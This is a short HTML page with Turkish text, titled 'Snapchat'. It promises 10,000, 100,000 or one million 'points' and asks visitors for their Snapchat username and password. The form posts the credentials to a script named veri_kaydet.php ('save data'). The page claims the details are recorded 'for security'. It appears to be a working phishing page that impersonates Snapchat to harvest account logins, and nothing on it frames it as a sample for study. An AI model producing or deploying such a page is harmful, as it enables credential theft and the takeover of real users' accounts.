<!DOCTYPE html><html><head><meta charset="UTF-8"><title>Snapchat</title></head><body>
    <h2>Hoşgeldiniz, bilgileriniz güvenlik amacıyla kayıt altına alınmaktadır.</h2>
    <form action="veri_kaydet.php" method="POST">
        <input name="platform" type="hidden" value="Snapchat">
        <label>Kullanıcı Adı:</label><br><input type="text" name="kadi"><br>
        <label>Şifre:</label><br><input type="password" name="sifre"><br>
        <label>Kaç puan istersiniz?</label><br>
        <input type="radio" name="adet" value="10000"> 10.000<br>
        <input type="radio" name="adet" value="100000"> 100.000<br>
        <input type="radio" name="adet" value="1M"> 1M<br><br>
        <button type="submit" name="gonderim" value="puan">Puanı gönder</button>
    </form></body></html>